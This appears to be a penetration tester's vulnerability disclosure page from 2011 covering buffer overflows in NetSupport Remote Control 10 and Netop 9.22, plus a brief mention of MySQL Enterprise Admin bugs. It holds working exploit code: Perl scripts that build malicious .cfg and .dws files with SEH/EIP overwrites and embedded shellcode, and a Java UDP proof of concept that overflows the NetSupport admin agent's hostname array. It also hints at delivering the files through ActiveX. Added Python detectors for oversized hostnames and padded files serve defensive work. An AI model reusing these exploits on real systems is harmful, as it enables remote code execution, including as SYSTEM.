Vulnerabilities

This page is used to store some older vulnerabilities discovered during penetration testing engagements before focusing solely on financial trading systems security.

Netsupport Remote Version 10 Local and Remote Buffer Overflow [30/07/2011]
I came across Netsupport Remote Control during a pentest engagement; when I got back to the lab I took a look at it in more detail, as I suspected similar bugs exist to those that have been found with Netop and other remote admin software. Sure enough I was right, and discovered a local file format overflow and a remote buffer overflow (running as SYSTEM on the Windows version). Netsupport have since released Version 11, which should address these issues.
The local file format bug is a bit lame, as you need to manually import the .cfg file; it cannot be triggered using the default handler, ActiveX or anything equally cool, so you're going to have to social engineer the admin into going to Tools > Import > Config.
Anyway, here is the perl script to generate the malicious config file:
#!/usr/bin/perl
# NetSupport Version 10 Local Buffer Overflow

my $junk="\x41" x 92;
my $nseh="\xeb\x1e\x90\x90"; # short jump over the SEH record into the nops
my $seh = pack('V',0x102350d4);#"\xd4\x50\x23\x10";
my $nops="\x90" x 24;
my $break="\xcc\xcc\xcc\xcc";

# shellcode, metasploit.com calc.exe size=164
my $shellcode =
"\x90\x90\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x61".
"\x28\x38\x56\x83\xeb\xfc\xe2\xf4\x9d\xc0\x7c\x56\x61\x28\xb3\x13".
"\x5d\xa3\x44\x53\x19\x29\xd7\xdd\x2e\x30\xb3\x09\x41\x29\xd3\x1f".
"\xea\x1c\xb3\x57\x8f\x19\xf8\xcf\xcd\xac\xf8\x22\x66\xe9\xf2\x5b".
"\x60\xea\xd3\xa2\x5a\x7c\x1c\x52\x14\xcd\xb3\x09\x45\x29\xd3\x30".
"\xea\x24\x73\xdd\x3e\x34\x39\xbd\xea\x34\xb3\x57\x8a\xa1\x64\x72".
"\x65\xeb\x09\x96\x05\xa3\x78\x66\xe4\xe8\x40\x5a\xea\x68\x34\xdd".
"\x11\x34\x95\xdd\x09\x20\xd3\x5f\xea\xa8\x88\x56\x61\x28\xb3\x3e".
"\x5d\x77\x09\xa0\x01\x7e\xb1\xae\xe2\xe8\x43\x06\x09\xd8\xb2\x52".
"\x3e\x40\xa0\xa8\xeb\x26\x6f\xa9\x86\x4b\x59\x3a\x02\x28\x38\x56";

my $payload = $junk.$nseh.$seh.$nops.$shellcode;
my $file = "config.cfg" ; #file name
open(my $FILE, ">$file") or die "Cannot open $file: $!";
print $FILE $payload ;
close($FILE);
print "Created Exploit: $file \n";
The remote vulnerability is a little cooler and allows exploitation of the remote admin client, which in turn can administer all the guest clients in the environment = Total Pwnage. Netsupport listens on UDP port 5405 for incoming "Hello, where are you?" requests from the server agent; the client then responds with its hostname, which is added to an array on the server, and an admin can then select this hostname to connect to and control.
Yep, you guessed it: the Netsupport server agent does not check the length of the hostname before copying it into the array. The following dirty Java code should be enough of a PoC to get a working exploit:
import java.io.ByteArrayOutputStream;
import java.io.DataOutputStream;
import java.net.DatagramPacket;
import java.net.DatagramSocket;

public class NetSupportPoC {
    public static void main(String[] args) throws Exception {
        // Pose as a guest client: wait on UDP 5405 for the server agent's "where are you?" probe
        DatagramSocket serverSocket = new DatagramSocket(5405);
        byte[] buf = new byte[256];
        DatagramPacket packet = new DatagramPacket(buf, buf.length);
        serverSocket.receive(packet);
        DatagramSocket socket = new DatagramSocket();
        // Two-byte header followed by a metasploit pattern in place of the hostname
        byte[] byteArrayShellcode2 = new byte[] {0x02, 0x00, 0x41, 0x61, 0x30, 0x41, 0x61, 0x31, 0x41, 0x61, 0x32, 0x41, 0x61, 0x33, 0x41, 0x61, 0x34, 0x41, 0x61, 0x35, 0x41, 0x61, 0x36, 0x41, 0x61, 0x37, 0x41, 0x61, 0x38, 0x41, 0x61, 0x39, 0x41, 0x62, 0x30, 0x41, 0x62, 0x31, 0x41, 0x62, 0x32, 0x41, 0x62, 0x33, 0x41, 0x62, 0x34, 0x41, 0x62, 0x35, 0x41, 0x62, 0x36, 0x41, 0x62, 0x37, 0x41, 0x62, 0x38, 0x41, 0x62, 0x39, 0x41, 0x63, 0x30, 0x41, 0x63, 0x31, 0x41, 0x63, 0x32, 0x41, 0x63, 0x33, 0x41, 0x63, 0x34, 0x41, 0x63, 0x35, 0x41, 0x63, 0x36, 0x41, 0x63, 0x37, 0x41, 0x63, 0x38, 0x41, 0x63, 0x39, 0x41, 0x64, 0x30, 0x41, 0x64, 0x31, 0x41, 0x64, 0x32, 0x41, 0x64, 0x33, 0x41, 0x64, 0x34, 0x41, 0x64, 0x35, 0x41, 0x64, 0x36, 0x41, 0x64, 0x37, 0x41, 0x64, 0x38, 0x41, 0x64, 0x39, 0x41, 0x65, 0x30, 0x41, 0x65, 0x31, 0x41, 0x65, 0x32, 0x41, 0x65, 0x33, 0x41, 0x65, 0x34, 0x41, 0x65, 0x35, 0x41, 0x65, 0x36, 0x41, 0x65, 0x37, 0x41, 0x65, 0x38, 0x41, 0x65, 0x39, 0x41, 0x66, 0x30, 0x41, 0x66, 0x31, 0x41, 0x66, 0x32, 0x41, 0x66, 0x33, 0x41, 0x66, 0x34, 0x41, 0x66, 0x35, 0x41, 0x66, 0x36, 0x41, 0x66, 0x37, 0x41, 0x66, 0x38, 0x41, 0x66, 0x39, 0x41, 0x67, 0x30, 0x41, 0x67, 0x31, 0x41, 0x67, 0x32, 0x41, 0x67, 0x33, 0x41, 0x67, 0x34, 0x41, 0x67, 0x35, 0x41, 0x67, 0x36, 0x41, 0x67, 0x37};
        String value = new String(byteArrayShellcode2);
        ByteArrayOutputStream byteOut = new ByteArrayOutputStream();
        DataOutputStream dataOut = new DataOutputStream(byteOut);
        dataOut.writeBytes(value);
        byte[] data = byteOut.toByteArray();
        // Reply to whichever address and port the agent's probe came from
        DatagramPacket clientPacket = new DatagramPacket(data, data.length, packet.getAddress(), packet.getPort());
        socket.send(clientPacket);
        socket.close();
        serverSocket.close();
    }
}
The above payload uses a Metasploit pattern so you can trace the crash offset in your debugger of choice.
That's it for now. Cheers.
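As an added, defensive counterpart to the PoC above (example code written for this page, not NetSupport's code and not the author's), here is a small Python checker that inspects captured client replies and flags any hostname that could never fit a sane hostname array. It assumes the layout seen in the PoC, a two-byte header (0x02 0x00) followed by the hostname, and that replies leave the client from UDP port 5405; both are assumptions for the example rather than documented protocol facts, and the sample datagrams are constructed.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

# Assumptions for this example (not NetSupport's documented protocol):
#  - client replies come *from* UDP port 5405, the port the client listens on
#  - a reply is a two-byte header (0x02 0x00 in the PoC) followed by the hostname
NETSUPPORT_PORT = 5405
HEADER_LEN = 2
MAX_LABEL = 63        # RFC 1035 single-label limit
MAX_HOSTNAME = 255    # RFC 1035 full-name limit
LABEL_RE = re.compile(rb"^[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?$")


@dataclass
class Finding:
    src: str
    reason: str
    hostname_len: int


def extract_hostname(payload: bytes) -> bytes:
    """Hostname field of a client reply: bytes after the header, up to a NUL if present."""
    return payload[HEADER_LEN:].split(b"\x00", 1)[0]


def check_reply(src: str, src_port: int, payload: bytes) -> Optional[Finding]:
    """Return a Finding if this datagram looks like an oversize or malformed hostname reply."""
    if src_port != NETSUPPORT_PORT or len(payload) <= HEADER_LEN:
        return None                      # not a client reply, or nothing to inspect
    host = extract_hostname(payload)
    if len(host) > MAX_HOSTNAME:
        return Finding(src, "hostname exceeds 255 bytes", len(host))
    labels = host.split(b".")
    if any(len(lbl) > MAX_LABEL for lbl in labels):
        return Finding(src, "hostname label exceeds 63 bytes", len(host))
    if not all(LABEL_RE.match(lbl) for lbl in labels):
        return Finding(src, "hostname contains non-hostname bytes", len(host))
    return None


def scan(datagrams: Iterable[Tuple[str, int, bytes]]) -> List[Finding]:
    """Run check_reply over (src_ip, src_port, payload) tuples and collect the findings."""
    findings = []
    for src, sport, payload in datagrams:
        finding = check_reply(src, sport, payload)
        if finding:
            findings.append(finding)
    return findings


# Constructed sample traffic (not a real capture): one legitimate reply, one reply padded
# to 300 bytes the way the PoC overfills the hostname array, one reply carrying raw
# opcode-like bytes, and an unrelated datagram from another port.
SAMPLE = [
    ("10.0.0.21", 5405, b"\x02\x00WORKSTATION-07"),
    ("10.0.0.99", 5405, b"\x02\x00" + b"A" * 300),
    ("10.0.0.98", 5405, b"\x02\x00HOST\x90\x90\xcc\xcc"),
    ("10.0.0.5", 53, b"\x02\x00" + b"B" * 300),
]

if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f"ALERT {f.src}: {f.reason} (len={f.hostname_len})")
```

Feed it (src_ip, src_port, payload) tuples from whatever packet capture tooling you already run; the same three checks are what a vendor-side fix needs before the copy into the array, plus bounding the copy itself to the array size.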


Netop 9.22 File Format Buffer Overflow [30/07/2011]
I discovered a buffer overflow in Netop when it handles .dws files (the default Netop session files). I reported it to Netop in early 2010 and they sat on it until somebody dropped it on the Full Disclosure mailing list :-) Here is the exploit from chap0 hosted on exploit-db; he did a more thorough job than me and made it compatible with Netop 8.0 - 9.5.
So here is my attempt: a simple Perl script to create a malicious .dws file to spawn the old faithful, calc.exe.
#!/usr/bin/perl
# NetOP Guest Version 9.22 Local Buffer Overflow
# Mylestro

my $buf = "\x41" x 524;
my $eip = "\x70\x85\x11\x00" ; #\x70\x85\x11\x00

# shellcode, metasploit.com calc.exe size=164
my $shellcode =
"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x61".
"\x28\x38\x56\x83\xeb\xfc\xe2\xf4\x9d\xc0\x7c\x56\x61\x28\xb3\x13".
"\x5d\xa3\x44\x53\x19\x29\xd7\xdd\x2e\x30\xb3\x09\x41\x29\xd3\x1f".
"\xea\x1c\xb3\x57\x8f\x19\xf8\xcf\xcd\xac\xf8\x22\x66\xe9\xf2\x5b".
"\x60\xea\xd3\xa2\x5a\x7c\x1c\x52\x14\xcd\xb3\x09\x45\x29\xd3\x30".
"\xea\x24\x73\xdd\x3e\x34\x39\xbd\xea\x34\xb3\x57\x8a\xa1\x64\x72".
"\x65\xeb\x09\x96\x05\xa3\x78\x66\xe4\xe8\x40\x5a\xea\x68\x34\xdd".
"\x11\x34\x95\xdd\x09\x20\xd3\x5f\xea\xa8\x88\x56\x61\x28\xb3\x3e".
"\x5d\x77\x09\xa0\x01\x7e\xb1\xae\xe2\xe8\x43\x06\x09\xd8\xb2\x52".
"\x3e\x40\xa0\xa8\xeb\x26\x6f\xa9\x86\x4b\x59\x3a\x02\x28\x38\x56";

my $exploit = "$buf$eip$shellcode"; #exploit structure
my $file = "NetOpScript.dws" ; #file name
open(my $FILE, ">$file") or die "Cannot open $file: $!";
print $FILE $exploit ;
close($FILE);
print "Created Exploit: $file \n";
Netop has the ability to launch the client and configure it with .dws scripts from an ActiveX control... I'll leave the rest to you ;-)
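Both file-format bugs on this page share a shape: hundreds of bytes of filler, then an overwritten SEH record or return address, then code. As an added example (not Netop's, NetSupport's or the author's code), here is a Python triage script to run over a .cfg or .dws file before an operator imports it. The thresholds and the benign sample's layout are assumptions; the malicious sample is constructed to mirror the structure of the script above, with non-printable filler in place of the shellcode.

```python
from typing import Dict, List, Tuple

# Thresholds are assumptions for this example, picked with the two layouts on this page
# in mind (92 and 524 bytes of filler ahead of the overwritten SEH record / EIP). Tune
# them against known-good .cfg/.dws files from your own deployment.
MAX_RUN = 64                 # longest run of one repeated byte a text config should need
MAX_NONPRINT_RATIO = 0.05    # share of bytes outside printable ASCII plus TAB/CR/LF
PRINTABLE = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}


def longest_byte_run(data: bytes) -> Tuple[int, int]:
    """Length and value of the longest run of a single repeated byte ((0, 0) for empty input)."""
    best_len = best_byte = 0
    cur_len, prev = 0, None
    for b in data:
        cur_len = cur_len + 1 if b == prev else 1
        prev = b
        if cur_len > best_len:
            best_len, best_byte = cur_len, b
    return best_len, best_byte


def nonprintable_ratio(data: bytes) -> float:
    """Fraction of bytes that are not printable ASCII (or TAB/CR/LF)."""
    return 0.0 if not data else sum(b not in PRINTABLE for b in data) / len(data)


def triage(data: bytes) -> Dict[str, object]:
    """Flag a session/config file whose shape matches padding + address + code rather than text."""
    run_len, run_byte = longest_byte_run(data)
    ratio = nonprintable_ratio(data)
    reasons: List[str] = []
    if run_len > MAX_RUN:
        reasons.append(f"{run_len}-byte run of 0x{run_byte:02x} (overflow filler?)")
    if ratio > MAX_NONPRINT_RATIO:
        reasons.append(f"{ratio:.0%} non-printable bytes in a text-format file")
    return {"longest_run": run_len, "nonprint_ratio": ratio,
            "reasons": reasons, "suspicious": bool(reasons)}


def triage_file(path: str) -> Dict[str, object]:
    """Read a file from disk and triage it; run this before importing a file from an untrusted source."""
    with open(path, "rb") as fh:
        return triage(fh.read())


# Constructed samples (not real Netop/NetSupport files): a plausible text session file, and
# a file laid out like the exploit above with non-printable filler standing in for shellcode.
BENIGN = b"[Session]\r\nHost=10.0.0.12\r\nProtocol=TCP\r\nName=Lab guest\r\n"
MALICIOUS = b"\x41" * 524 + b"\x70\x85\x11\x00" + bytes(range(0x80, 0xFF))

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("malicious", MALICIOUS)):
        result = triage(blob)
        print(name, "SUSPICIOUS" if result["suspicious"] else "ok", result["reasons"])
```

The two heuristics are deliberately format-agnostic, so the same script covers the .cfg import path from the Netsupport section and the .dws path here; a product-side fix is to bound each field read to its destination buffer and reject the file on the first oversize field.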

MySQL Enterprise Admin [30/07/2011]
Two comedy web application bugs discovered in MySQL Enterprise Admin: one is an XSS and the other is a privilege escalation (from read-only to super user) via parameter manipulation (I was actually looking for buffer overflows in the MySQL agent but shelved the project as I had heaps of other stuff to do). Anyway, I reported them and they got fixed within two weeks.